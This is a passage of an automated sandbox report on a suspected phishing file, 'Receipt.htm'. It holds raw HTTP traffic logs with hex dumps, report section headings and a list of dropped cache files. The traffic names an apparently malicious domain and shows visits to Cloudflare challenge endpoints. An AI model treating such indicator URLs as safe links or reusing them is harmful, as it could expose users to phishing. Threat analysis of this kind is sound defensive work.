2024-10-30 15:05:38 UTC	747	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 15:05:38 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 149824 Connection: close cf-chl-gen: YmcveuuSyIPeUydUC5YVvrSfbcCvmJspTHqGSRNqYHL/6ZrdaHlFdgfeUN8NwDyd4wplN7uE0Suuo/ylovr5TzHwdQeKbvcUbMEM1l/ssB+kUh5vR3AV/SYXKSwzNozkGDXCp9CmVQD5rirXFKMLx4tMgJoR59DQWHwz3Vgn+pdqGaE/mz+GTqepFZi8uQ3I591+cSytgvdvIha3QfuJqq3SBkp6PhlQHBm/uemIt9nIz9y3zKFv045ausdCz4CKuLtk42kTU+8bskZBfAEGFE+61TD3oifjet/CTmjiEtKhIYow/TBKmvGOB9pzsTsXfF2+UG1PlQLLhO2Vxuhv+jpGbAPGClPIbEMl0IuMOxPoiS8b4+ih85ezYg4Ll5FkauYhKxaO3Rz69ZXKyQkE0CRPoQsvQjF4AbjsJPEfiuKCEr/fcEzcZcpOId9eGT2LjPEfEgreNAfwUPhpHyaGYhIiX/S/CUKlaJczLCKxHVXvTQ4=$gyFANQSAldKBIn3z Server: cloudflare CF-RAY: 8dac4dfe1d0b4629-DFW alt-svc: h3=":443"; ma=86400
2024-10-30 15:05:38 UTC	622	IN	Data Raw: 63 49 74 61 54 32 6c 70 68 32 4b 59 67 32 4f 58 55 6c 65 52 57 47 6d 4f 57 46 56 6b 66 46 31 30 6f 5a 64 37 5a 35 65 62 62 5a 31 69 69 70 46 77 6b 49 64 78 67 4b 53 59 6a 71 36 45 63 35 4b 49 6d 61 6d 41 67 72 43 6b 6e 72 43 49 78 36 4b 54 78 63 72 4a 69 37 72 52 76 34 75 64 6e 74 57 6e 30 64 62 4a 6c 38 6e 62 7a 4c 47 57 75 62 32 6a 72 61 32 6c 74 36 65 6d 71 4b 58 59 7a 62 72 71 6f 74 37 53 37 71 62 4e 77 62 62 4c 35 72 48 4c 78 63 2b 38 75 2b 7a 67 31 75 79 32 42 66 6a 79 34 4d 62 49 77 76 6a 73 37 63 76 47 2f 73 33 6b 79 67 4d 59 47 51 33 6a 39 50 6f 52 38 64 44 73 44 68 2f 35 34 65 34 55 47 68 37 37 43 78 34 59 39 2b 63 6a 2b 66 41 66 4e 50 50 6d 4d 79 54 32 43 67 49 47 38 51 63 6d 2f 45 48 79 51 44 55 56 4c 52 41 41 50 30 4d 37 48 54 6b 72 49 79 30 Data Ascii: cItaT2lph2KYg2OXUleRWGmOWFVkfF10oZd7Z5ebbZ1iipFwkIdxgKSYjq6Ec5KImamAgrCknrCIx6KTxcrJi7rRv4udntWn0dbJl8nbzLGWub2jra2lt6emqKXYzbrqot7S7qbNwbbL5rHLxc+8u+zg1uy2Bfjy4MbIwvjs7cvG/s3kygMYGQ3j9PoR8dDsDh/54e4UGh77Cx4Y9+cj+fAfNPPmMyT2CgIG8Qcm/EHyQDUVLRAAP0M7HTkrIy0
2024-10-30 15:05:38 UTC	1369	IN	Data Raw: 30 6a 4d 46 38 6a 4e 78 78 70 59 47 6b 33 4b 57 51 37 4a 45 73 2f 4c 30 42 6d 62 54 6b 36 55 6c 42 63 52 31 45 37 56 58 59 35 63 30 4a 68 56 48 64 6f 51 33 64 69 56 32 4b 47 67 6c 70 79 66 59 4e 65 64 49 69 55 62 56 69 45 65 6c 68 79 57 6e 39 31 64 6c 35 69 6c 70 4a 32 6b 71 6d 63 5a 35 74 38 6f 6f 31 71 62 4b 53 45 6b 49 36 7a 63 6f 61 51 6d 35 64 7a 6c 36 79 72 71 35 2f 44 72 5a 65 31 75 35 43 48 74 72 65 47 77 38 75 59 6f 4b 4c 46 6e 4d 2b 68 74 49 33 49 73 35 69 34 71 4d 61 78 73 70 61 62 75 4d 37 43 76 36 4b 76 76 71 4b 6a 79 64 6a 57 75 61 79 6e 32 63 65 72 36 76 50 7a 79 4f 37 33 2b 4d 7a 79 2b 2f 33 51 39 67 44 36 31 50 6f 45 41 4e 6a 2b 43 41 58 63 41 77 77 44 34 41 63 51 43 4f 51 4c 46 41 37 6f 44 78 67 4c 37 42 4d 63 45 66 41 58 49 42 62 79 45 Data Ascii: 0jMF8jNxxpYGk3KWQ7JEs/L0BmbTk6UlBcR1E7VXY5c0JhVHdoQ3diV2KGglpyfYNedIiUbViEelhyWn91dl5ilpJ2kqmcZ5t8oo1qbKSEkI6zcoaQm5dzl6yrq5/DrZe1u5CHtreGw8uYoKLFnM+htI3Is5i4qMaxspabuM7Cv6KvvqKjydjWuayn2cer6vPzyO73+Mzy+/3Q9gD61PoEANj+CAXcAwwD4AcQCOQLFA7oDxgL7BMcEfAXIBbyE
2024-10-30 15:05:38 UTC	1369	IN	Data Raw: 61 61 6c 73 38 62 46 6b 78 53 30 41 72 53 47 55 74 51 56 5a 4a 65 46 42 51 5a 6e 5a 2f 64 6c 52 36 67 33 74 59 66 6f 65 42 58 49 4b 4c 66 6d 43 47 6a 34 52 6b 69 70 4f 4a 5a 6f 56 56 69 35 4b 53 6d 34 79 54 6d 70 75 5a 6c 33 4f 4d 6d 4a 64 2b 67 4b 52 31 65 31 36 6f 65 59 42 36 72 48 32 45 68 72 43 42 68 37 53 30 68 59 74 31 75 49 6d 50 66 62 79 4e 6b 37 54 41 6b 5a 65 38 78 4a 57 62 78 63 32 62 78 63 44 42 6f 4a 79 47 78 61 4f 4a 73 73 6d 6f 75 71 72 4e 71 37 57 70 77 62 4f 30 33 4e 48 62 78 74 65 34 33 61 53 6c 77 37 71 2b 34 36 71 78 38 62 50 47 77 76 58 42 78 4d 6a 4c 39 50 48 48 75 39 36 37 32 4c 37 43 38 2f 4c 57 33 74 4d 4a 79 4d 66 6c 2b 75 34 44 41 2b 51 44 45 2f 55 48 43 41 76 6f 44 41 6f 55 32 51 7a 33 47 69 50 72 49 64 76 75 35 53 66 69 35 76 Data Ascii: aals8bFkxS0ArSGUtQVZJeFBQZnZ/dlR6g3tYfoeBXIKLfmCGj4RkipOJZoVVi5KSm4yTmpuZl3OMmJd+gKR1e16oeYB6rH2EhrCBh7S0hYt1uImPfbyNk7TAkZe8xJWbxc2bxcDBoJyGxaOJssmouqrNq7WpwbO03NHbxte43aSlw7q+46qx8bPGwvXBxMjL9PHHu9672L7C8/LW3tMJyMfl+u4DA+QDE/UHCAvoDAoU2Qz3GiPrIdvu5Sfi5v
2024-10-30 15:05:38 UTC	1369	IN	Data Raw: 52 47 70 7a 62 55 68 75 64 32 70 4d 63 6e 74 77 55 48 5a 2f 64 56 4a 78 51 58 64 2b 66 6f 64 34 66 34 61 48 68 59 4e 66 63 59 39 78 61 57 35 56 59 57 64 4b 6c 47 56 73 5a 70 68 70 63 48 4b 63 62 58 4f 67 6f 48 46 33 58 35 2b 44 5a 35 75 6f 6e 35 31 6d 62 33 79 4d 70 49 32 74 70 61 6c 30 72 4c 4f 63 6a 36 2b 75 6a 58 32 74 74 4a 53 68 66 4a 48 42 65 36 61 54 77 37 69 69 79 38 53 4a 7a 64 53 75 71 35 47 6d 78 35 47 75 30 72 48 4e 71 39 61 53 74 63 43 77 77 75 54 43 6e 71 50 43 6e 4f 6e 65 7a 65 44 58 30 4d 4f 6b 78 4c 37 70 76 37 4b 7a 7a 65 62 61 32 37 58 4e 32 63 2b 39 77 76 4c 45 31 74 44 36 76 77 6a 47 33 75 72 48 34 39 37 67 37 77 67 56 38 73 2f 71 30 74 59 49 42 2b 76 6c 31 39 33 63 32 2f 6e 73 33 42 30 51 44 2f 45 68 46 42 4d 63 4a 52 67 50 4d 43 6b Data Ascii: RGpzbUhud2pMcntwUHZ/dVJxQXd+fod4f4aHhYNfcY9xaW5VYWdKlGVsZphpcHKcbXOgoHF3X5+DZ5uon51mb3yMpI2tpal0rLOcj6+ujX2ttJShfJHBe6aTw7iiy8SJzdSuq5Gmx5Gu0rHNq9aStcCwwuTCnqPCnOnezeDX0MOkxL7pv7Kzzeba27XN2c+9wvLE1tD6vwjG3urH497g7wgV8s/q0tYIB+vl193c2/ns3B0QD/EhFBMcJRgPMCk
2024-10-30 15:05:38 UTC	1369	IN	Data Raw: 46 52 51 52 32 68 63 5a 32 78 77 57 33 6d 41 58 30 42 34 62 32 68 5a 64 6d 42 71 65 6d 79 47 53 55 78 63 57 33 47 43 67 70 52 6f 64 35 46 70 57 70 36 4b 66 6f 42 34 59 70 4e 33 56 32 61 44 6e 6e 71 53 64 57 57 6b 6a 61 79 46 65 70 36 44 68 5a 2b 6f 74 6e 47 7a 70 59 52 36 76 71 71 65 71 59 43 42 65 59 4a 39 6a 34 2b 51 71 62 58 44 79 59 79 45 74 38 2b 49 6f 64 43 72 6b 36 44 46 79 38 2b 72 6c 35 53 79 33 38 33 4f 75 64 6a 4d 34 74 47 78 35 65 50 55 71 71 58 70 37 4d 76 4c 35 38 54 6c 79 4f 50 45 36 36 2f 78 74 4f 58 7a 79 37 72 76 37 73 2b 2f 7a 50 48 37 38 64 4d 45 2f 4d 45 4d 31 75 4c 6a 79 63 6b 42 32 2b 2f 4f 36 68 4c 56 7a 52 50 6f 35 50 6b 4c 45 78 51 42 47 75 41 44 2f 52 37 6b 42 77 41 6f 43 67 73 49 49 42 38 64 48 77 38 52 36 77 55 46 4c 65 67 49 Data Ascii: FRQR2hcZ2xwW3mAX0B4b2hZdmBqemyGSUxcW3GCgpRod5FpWp6KfoB4YpN3V2aDnnqSdWWkjayFep6DhZ+otnGzpYR6vqqeqYCBeYJ9j4+QqbXDyYyEt8+IodCrk6DFy8+rl5Sy383OudjM4tGx5ePUqqXp7MvL58TlyOPE66/xtOXzy7rv7s+/zPH78dME/MEM1uLjyckB2+/O6hLVzRPo5PkLExQBGuAD/R7kBwAoCgsIIB8dHw8R6wUFLegI
2024-10-30 15:05:38 UTC	1369	IN	Data Raw: 64 38 55 45 46 51 59 48 46 46 68 59 4f 42 66 31 6c 67 68 59 4e 64 62 49 6d 48 59 58 53 46 59 59 39 79 6b 59 39 70 61 6f 6c 58 57 4a 69 4c 6b 5a 4f 43 65 57 5a 78 58 33 32 62 61 47 4f 42 6f 49 46 6e 68 61 53 72 61 34 6d 6d 64 47 2b 4e 71 35 57 72 6a 4c 56 33 71 4a 65 4f 6d 38 43 6c 6e 34 50 48 78 4c 75 35 6a 49 6d 35 76 5a 76 53 69 49 6d 77 6e 5a 2b 67 79 4c 4c 52 79 63 79 7a 71 64 54 54 34 71 76 51 6d 70 79 76 72 37 44 4a 33 4f 50 4d 75 73 58 63 32 37 47 77 77 4d 76 4c 39 39 43 32 2b 73 53 30 39 4f 66 6d 79 66 6a 72 36 76 50 38 37 2b 59 49 41 66 50 72 35 51 58 33 37 77 44 67 35 77 72 6c 44 51 44 32 2b 4e 59 44 41 78 4d 64 36 2f 6f 52 49 75 33 63 2b 79 58 38 49 41 41 70 41 69 51 45 4c 51 67 6f 43 44 45 46 42 51 41 68 4b 78 51 75 38 78 45 46 2b 50 63 57 38 Data Ascii: d8UEFQYHFFhYOBf1lghYNdbImHYXSFYY9ykY9paolXWJiLkZOCeWZxX32baGOBoIFnhaSra4mmdG+Nq5WrjLV3qJeOm8Cln4PHxLu5jIm5vZvSiImwnZ+gyLLRycyzqdTT4qvQmpyvr7DJ3OPMusXc27GwwMvL99C2+sS09Ofmyfjr6vP87+YIAfPr5QX37wDg5wrlDQD2+NYDAxMd6/oRIu3c+yX8IAApAiQELQgoCDEFBQAhKxQu8xEF+PcW8
2024-10-30 15:05:38 UTC	1369	IN	Data Raw: 34 59 58 31 45 50 46 78 57 66 46 5a 66 53 32 56 2b 63 6d 74 52 59 34 65 47 6a 47 4f 4b 6a 48 61 55 5a 33 65 51 67 48 61 41 70 6d 4e 7a 6c 4a 4f 54 69 32 65 46 6d 6f 36 69 67 6e 79 77 71 4c 47 43 6c 71 79 53 6b 61 69 78 64 48 53 77 76 58 32 43 73 49 4f 46 65 4a 2b 54 67 34 43 69 7a 63 36 45 7a 4b 2f 53 71 4e 48 46 6c 4a 62 56 73 35 4b 51 73 39 57 62 33 4c 79 33 75 4c 65 34 6e 37 76 53 7a 39 4b 70 6f 4f 79 6b 78 61 37 47 33 61 33 4c 79 73 2f 32 74 73 37 50 73 4b 7a 74 32 63 6e 58 38 64 58 4e 32 64 2f 76 30 75 44 6a 39 39 72 6b 31 2f 76 61 36 4f 7a 5a 34 2b 37 66 37 4e 58 6e 7a 67 76 6e 38 68 77 50 39 4f 62 36 36 66 4c 76 2b 77 62 77 39 43 59 4a 46 69 6b 4a 4a 67 51 46 43 79 51 62 41 53 77 67 49 67 4d 58 4c 44 73 46 46 42 55 56 39 42 63 56 49 6a 55 73 4a 52 Data Ascii: 4YX1EPFxWfFZfS2V+cmtRY4eGjGOKjHaUZ3eQgHaApmNzlJOTi2eFmo6ignywqLGClqySkaixdHSwvX2CsIOFeJ+Tg4Cizc6EzK/SqNHFlJbVs5KQs9Wb3Ly3uLe4n7vSz9KpoOykxa7G3a3Lys/2ts7PsKzt2cnX8dXN2d/v0uDj99rk1/va6OzZ4+7f7NXnzgvn8hwP9Ob66fLv+wbw9CYJFikJJgQFCyQbASwgIgMXLDsFFBUV9BcVIjUsJR
2024-10-30 15:05:38 UTC	1369	IN	Data Raw: 53 31 64 39 68 33 31 6c 66 33 78 4e 6b 6d 4a 74 6d 57 64 74 5a 46 57 61 61 6e 35 33 58 46 32 55 64 6d 61 48 66 71 56 31 59 61 5a 38 65 49 32 65 70 71 71 51 62 34 31 6f 74 61 71 5a 72 4c 4f 63 6a 48 43 51 6a 72 57 4d 6b 33 2b 65 65 4d 57 36 71 62 7a 44 72 4a 2b 2f 76 70 32 4e 77 4a 7a 53 78 34 79 76 30 5a 65 5a 32 72 53 76 71 4c 7a 61 77 74 6d 62 6e 37 37 53 78 73 54 48 74 74 76 56 6f 37 62 76 77 62 79 38 35 71 2f 30 73 2b 44 57 73 38 36 32 75 75 76 71 7a 2f 50 52 41 63 43 2f 33 4c 67 47 2f 75 6e 38 38 2b 7a 64 35 65 63 4e 34 4e 48 67 38 41 4c 56 46 68 51 53 45 4f 6b 4c 46 68 54 74 46 78 6f 59 38 66 67 65 48 50 55 46 49 69 44 35 44 52 37 35 4b 41 73 71 4b 41 49 44 49 75 2f 77 4d 53 51 71 4d 42 55 6f 4e 67 2f 33 46 6a 51 42 2b 78 6f 35 47 67 41 65 50 55 51 Data Ascii: S1d9h31lf3xNkmJtmWdtZFWaan53XF2UdmaHfqV1YaZ8eI2epqqQb41otaqZrLOcjHCQjrWMk3+eeMW6qbzDrJ+/vp2NwJzSx4yv0ZeZ2rSvqLzawtmbn77SxsTHttvVo7bvwby85q/0s+DWs862uuvqz/PRAcC/3LgG/un88+zd5ecN4NHg8ALVFhQSEOkLFhTtFxoY8fgeHPUFIiD5DR75KAsqKAIDIu/wMSQqMBUoNg/3FjQB+xo5GgAePUQ
2024-10-30 15:05:38 UTC	1369	IN	Data Raw: 59 52 72 56 56 47 4c 55 6d 4e 6a 61 48 6c 75 64 6d 42 74 6d 35 46 62 65 4a 2b 57 64 57 57 57 68 32 79 45 69 57 64 6e 68 4b 43 66 6e 35 4f 32 63 61 75 76 6a 61 4f 76 71 58 31 35 73 33 71 4c 65 62 62 43 6c 37 53 6c 6c 38 4f 35 67 36 44 48 76 70 32 4e 76 5a 2b 2f 70 61 2f 4a 78 38 53 6b 6c 71 76 53 75 39 6e 62 6e 63 71 74 6e 64 7a 46 35 4c 32 6c 31 4f 6e 65 74 62 7a 75 78 63 48 72 34 61 76 49 37 2b 62 46 74 65 58 48 35 39 54 59 32 39 33 73 7a 4c 37 54 2b 75 4d 43 42 4d 58 79 31 63 55 46 37 51 33 6c 7a 66 77 53 42 77 6a 6e 46 39 44 72 46 41 72 54 38 42 67 50 37 64 30 4f 37 78 44 38 41 50 50 39 46 66 54 6d 2b 79 4d 4d 4b 69 7a 74 47 2f 33 74 4c 52 59 31 44 76 55 6c 4f 78 6a 7a 44 67 6f 42 45 54 77 79 2b 78 6c 41 4e 78 59 47 4e 68 67 34 4a 53 73 63 45 54 30 64 Data Ascii: YRrVVGLUmNjaHludmBtm5FbeJ+WdWWWh2yEiWdnhKCfn5O2cauvjaOvqX15s3qLebbCl7Sll8O5g6DHvp2NvZ+/pa/Jx8SklqvSu9nbncqtndzF5L2l1OnetbzuxcHr4avI7+bFteXH59TY293szL7T+uMCBMXy1cUF7Q3lzfwSBwjnF9DrFArT8BgP7d0O7xD8APP9FfTm+yMMKiztG/3tLRY1DvUlOxjzDgoBETwy+xlANxYGNhg4JSscET0d

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Receipt.htm

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Data Obfuscation

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5888_459419989\LICENSE

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5888_459419989\_metadata\verified_contents.json

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5888_459419989\manifest.fingerprint

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5888_459419989\manifest.json

C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5888_459419989\sets.json

Chrome Cache Entry: 149

Chrome Cache Entry: 150

Chrome Cache Entry: 151

Chrome Cache Entry: 152

Chrome Cache Entry: 153

Chrome Cache Entry: 154

Chrome Cache Entry: 155

Chrome Cache Entry: 156

Chrome Cache Entry: 157

Chrome Cache Entry: 158

Chrome Cache Entry: 159

Chrome Cache Entry: 160

Chrome Cache Entry: 161

Chrome Cache Entry: 162

Chrome Cache Entry: 163

Chrome Cache Entry: 164

Chrome Cache Entry: 165

Chrome Cache Entry: 166

Chrome Cache Entry: 167

Chrome Cache Entry: 168

Chrome Cache Entry: 169

Chrome Cache Entry: 170

Windows Analysis Report
Receipt.htm

Timestamp	Bytes transferred	Direction	Data
2024-10-30 15:05:38 UTC	539	OUT	OPTIONS /report/v4?s=9tnKQcu8aFvvmKIn3VWKU%2F4Ykhbr%2FmnLHkB1XMQxqGDRL81by%2FetytXb8fQZQnfWDawuhROdpen8ayBUEZ%2BkR3mgBuoFOhk4QaXc5AyIkyIAu0ywx0a97b4x3JGEtA%3D%3D HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Origin: https://rpbr.ithbetoxi.com Access-Control-Request-Method: POST Access-Control-Request-Headers: content-type User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-30 15:05:38 UTC	336	IN	HTTP/1.1 200 OK Content-Length: 0 access-control-max-age: 86400 access-control-allow-methods: POST, OPTIONS access-control-allow-origin: * access-control-allow-headers: content-type, content-length date: Wed, 30 Oct 2024 15:05:37 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
2024-10-30 15:05:39 UTC	478	OUT	POST /report/v4?s=9tnKQcu8aFvvmKIn3VWKU%2F4Ykhbr%2FmnLHkB1XMQxqGDRL81by%2FetytXb8fQZQnfWDawuhROdpen8ayBUEZ%2BkR3mgBuoFOhk4QaXc5AyIkyIAu0ywx0a97b4x3JGEtA%3D%3D HTTP/1.1 Host: a.nel.cloudflare.com Connection: keep-alive Content-Length: 433 Content-Type: application/reports+json User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-30 15:05:39 UTC	433	OUT	Data Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 31 34 35 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 72 70 62 72 2e 69 74 68 62 65 74 6f 78 69 2e 63 6f 6d 2f 77 74 71 6c 6c 48 53 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 38 38 2e 31 31 34 2e 39 36 2e 33 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f Data Ascii: [{"age":0,"body":{"elapsed_time":145,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://rpbr.ithbetoxi.com/wtqllHS/","sampling_fraction":1.0,"server_ip":"188.114.96.3","status_code":404,"type":"http.error"},"type":"network-erro
2024-10-30 15:05:39 UTC	168	IN	HTTP/1.1 200 OK Content-Length: 0 date: Wed, 30 Oct 2024 15:05:39 GMT Via: 1.1 google Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close

Timestamp	Bytes transferred	Direction	Data
2024-10-30 15:05:39 UTC	597	OUT	GET /cdn-cgi/challenge-platform/h/b/flow/ov1/87538823:1730297856:oBwGVF8aHz7-DDxOT_QFbYFX36Y1gtPfSuG-jhTbWFg/8dac4dededb74654/PfObaQesvT7A2EWQGdm61TroT3kSUKiEz7Y_CiOUW88-1730300735-1.1.1.1-qKhEgUlBXOY7wv6GqGx1zxf7gW6G6B7NA82Ime_vB5lAzADjhlb9PX07Rq671hhT HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-30 15:05:39 UTC	379	IN	HTTP/1.1 404 Not Found Date: Wed, 30 Oct 2024 15:05:39 GMT Content-Type: application/json Content-Length: 7 Connection: close cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0 cf-chl-out: Y7dgsJ53/IfaXfZMgoAU5ImOa/h0F8sYkg8=$5WS2gpVMZX6zXAUs Server: cloudflare CF-RAY: 8dac4e05bb3a2e63-DFW alt-svc: h3=":443"; ma=86400
2024-10-30 15:05:39 UTC	7	IN	Data Raw: 69 6e 76 61 6c 69 64 Data Ascii: invalid

Timestamp	Bytes transferred	Direction	Data
2024-10-30 15:05:40 UTC	785	OUT	GET /cdn-cgi/challenge-platform/h/b/i/8dac4dededb74654/1730300738284/Q3v5SykX3Gv5MvN HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/bwuv1/0x4AAAAAAAxPQeoKC444sp2r/auto/fbE/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-30 15:05:40 UTC	200	IN	HTTP/1.1 200 OK Date: Wed, 30 Oct 2024 15:05:40 GMT Content-Type: image/png Content-Length: 61 Connection: close Server: cloudflare CF-RAY: 8dac4e09bf8ae827-DFW alt-svc: h3=":443"; ma=86400
2024-10-30 15:05:40 UTC	61	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0e 00 00 00 0d 08 02 00 00 00 16 be c8 28 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82 Data Ascii: PNGIHDR(IDAT$IENDB`

Timestamp	Bytes transferred	Direction	Data
2024-10-30 15:05:41 UTC	814	OUT	GET /cdn-cgi/challenge-platform/h/b/pat/8dac4dededb74654/1730300738289/98eca653d447cdc000bdf0a65b958be54b9faf6a738fce912fe31597e0703ff3/_DbY3QOlI9S0muO HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Cache-Control: max-age=0 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: / Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/bwuv1/0x4AAAAAAAxPQeoKC444sp2r/auto/fbE/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2024-10-30 15:05:42 UTC	143	IN	HTTP/1.1 401 Unauthorized Date: Wed, 30 Oct 2024 15:05:42 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 1 Connection: close
2024-10-30 15:05:42 UTC	2015	IN	Data Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 6d 4f 79 6d 55 39 52 48 7a 63 41 41 76 66 43 6d 57 35 57 4c 35 55 75 66 72 32 70 7a 6a 38 36 52 4c 2d 4d 56 6c 2d 42 77 50 5f 4d 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gmOymU9RHzcAAvfCmW5WL5Uufr2pzj86RL-MVl-BwP_MAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
2024-10-30 15:05:42 UTC	1	IN	Data Raw: 4a Data Ascii: J

Timestamp	Bytes transferred	Direction	Data
2024-10-30 15:05:43 UTC	1149	OUT	POST /cdn-cgi/challenge-platform/h/b/flow/ov1/87538823:1730297856:oBwGVF8aHz7-DDxOT_QFbYFX36Y1gtPfSuG-jhTbWFg/8dac4dededb74654/PfObaQesvT7A2EWQGdm61TroT3kSUKiEz7Y_CiOUW88-1730300735-1.1.1.1-qKhEgUlBXOY7wv6GqGx1zxf7gW6G6B7NA82Ime_vB5lAzADjhlb9PX07Rq671hhT HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive Content-Length: 31819 sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" Content-type: application/x-www-form-urlencoded sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 CF-Challenge: PfObaQesvT7A2EWQGdm61TroT3kSUKiEz7Y_CiOUW88-1730300735-1.1.1.1-qKhEgUlBXOY7wv6GqGx1zxf7gW6G6B7NA82Ime_vB5lAzADjhlb9PX07Rq671hhT sec-ch-ua-platform: "Windows" Accept: / Origin: https://challenges.cloudflare.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/bwuv1/0x4AAAAAAAxPQeoKC444sp2r/auto/fbE/normal/auto/ Accept-Encoding: gzip, deflate, br Accept-Language: 